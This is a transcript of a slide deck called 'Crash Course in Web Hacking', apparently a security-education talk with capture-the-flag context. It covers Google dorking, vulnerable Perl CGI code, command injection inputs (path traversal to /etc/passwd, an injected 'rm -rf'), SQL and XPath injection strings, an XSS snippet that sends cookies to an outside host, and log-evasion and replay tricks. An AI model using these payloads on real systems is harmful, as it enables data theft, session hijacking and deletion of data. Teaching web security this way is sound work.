Crash Course in Web Hacking

24
Mike Gerschefske

description

Mike Gerschefske. Crash Course in Web Hacking. Hacking is illegal (most of the time). Understand the laws Port Scanning can be considered illegal Post 9/11 can be act of terrorism DMCA Exceptions Educational Learning (Institution). Who cares about web hacking?. - PowerPoint PPT Presentation

Transcript of Crash Course in Web Hacking

Page 1: Crash Course in Web Hacking

Mike Gerschefske

Page 2: Crash Course in Web Hacking

Hacking is illegal (most of the time) Understand the laws Port Scanning can be considered

illegal Post 9/11 can be act of terrorism

DMCA Exceptions Educational Learning (Institution)

Page 3: Crash Course in Web Hacking

Who cares about web hacking? The days of buffer overflows and root

boxes are nearing an end… Non executing stacks People patching their systems

Everything is turning into a web system

Page 4: Crash Course in Web Hacking

Power of Google

Google knows all SSN/Credit Card, backend sql http://johnny.ihackstuff.com/ghdb.php

intitle:snc-rz30 inurl:home/ Robots.txt

Don’t put secrets in here

Page 5: Crash Course in Web Hacking

Power of the web browser

Is capable of HTTP GET/POST Capable of sending any kind of GET/POST Doesn’t have to run client side code (ie

javascript) Can send anything it wants to

Can be Bad: url: http://somesite/index.php?

section=Admin Vertical Escalation

Page 6: Crash Course in Web Hacking

Bad Code = Bad Security

You are not able to control client end: Cookies

Do not put User Level (admin, user, etc.) Vertical Escalation

Do not put user id Horizontal Escalation

Posts Gets Session IDs All Data

Page 7: Crash Course in Web Hacking

Museum Example

Code from two years ago: 1 #!/usr/bin/perl …

7 $first = param('first'); 8 $last = param('last'); 9 $password = param('password'); 10 … 25 if (($first eq "") || ($last eq "") || (! $password eq

"unbreakable")) { 26 print "<p>Could not understand or wrong password!!

</p>"; 27 } 28 else { 29 system "cat ./museum_ideas/${first}.${last}"; …

Page 8: Crash Course in Web Hacking

Some Good Combinations

Dump the password file:First Name: .

Last Name : /../../../../etc/passwd

Password  : unbreakable

Delete the whole directory:First Name: NOTEMPTY Last Name : & rm -rf

/home/museum/public_html/cgi_bin/museum_ideas

Password  : unbreakable

Page 9: Crash Course in Web Hacking

Command Injection

This is basic idea of command injection

Security through obscurity sometimes works

Some people are very diligent

Page 10: Crash Course in Web Hacking

SQL Injections

We can send commands, why not sql?

What is SQL?

What can we do with SQL? Get any data we want (that the user has

access to) Delete all the data the user has access to

If user is root, dump database If user is root, can upload and execute java/c from

database and root box

Page 11: Crash Course in Web Hacking

How to protect against it? Check parameters

Not really…

Need to do SQL parameterization when at all possible Mark strings as strings, ints as ints

SELECT * WHERE name = @

Page 12: Crash Course in Web Hacking

Why doesn’t checking params work? If you’re really smart it will, but if you

don’t understand the problem it wont This is a very difficult problem to understand

Example: http://viva/ictf/index.php/SQL_Injection

The problem is the ‘ (apostrophe) is a special character To fix we just find and replace all

apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string NO!

Page 13: Crash Course in Web Hacking

Second Level SQL Injection The problem actually isn’t solved, just

more complicated

Take:

Username = ' OR 'a' = 'a‘

SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

Page 14: Crash Course in Web Hacking

Goes in fine but coming out… Get username from DB and put in

var Var contains SQL We TRUST DB to give us good data Create another SQL Query and the

second one is now vulnerable

SELECT content FROM database WHERE username = VUNSQL

Page 15: Crash Course in Web Hacking

XSS – Cross Site Scripting Malicious injection of JavaScript Cookie Hi-jacking MySpace – Replicate itself, add friends

Samy - http://web.archive.org/web/20060208182348/namb.la/popular/tech.html

<script> document.write(“<img

src=http://site.com/a.jpg?cookie= “ + document.cookie)

</script>

Page 16: Crash Course in Web Hacking

Xpath Injection

//user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’]

Used with: XML RPC SOAP/WSDL

Page 17: Crash Course in Web Hacking

IDS Will Find You

SQL/Command Injection is very easy to detect

IDS poor at packet fragmentation with timing attacks

Page 18: Crash Course in Web Hacking

Profiling

Need to know what you’re attacking Can search for exploits

HEAD / HTTP/1.0 Example Everyone’s a little different

Nmap is a good profiler Nessus will profile too

Page 19: Crash Course in Web Hacking

Tools

Add N Edit Cookie – Mozilla Firefox extension

Wget TamperData – FireFox Modify Headers - FireFox Curl Netcat/Telnet

Proxies Paros Proxy – Free Fiddler – Microsoft, Free Spike – Free

Page 20: Crash Course in Web Hacking

Timing Attacks

Breaking Authentication Username and password wrong may

take x time while username doesn’t exist takes y time

Successful timing attacks against encryption

Page 21: Crash Course in Web Hacking

ASP.NET Exploit

Debugging (source code) only available to localhost

Bypass this check by sending the following: GET http://localhost/bleh.asp?a=j HTTP/1.0

Check’s server name variable rather then remote address

Page 22: Crash Course in Web Hacking

Mod_security

http://www.modsecurity.org/

Page 23: Crash Course in Web Hacking

Replay Attacks

Socrebot deletes flag Scorebot adds flag

Since the scorebot goes to everyone we have the delete and add sequence

Can potentially replay same delete sequence across all enemy servers

Page 24: Crash Course in Web Hacking

Log Evasion

Many logs only log ~4K of URL Prevents DOS from filling up logs

If payload at the end of 4k, wont log malicious payload

http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD Application ignores foo parameter Log shows up as GET /page.asp …

Not just IIS, Sun One App Server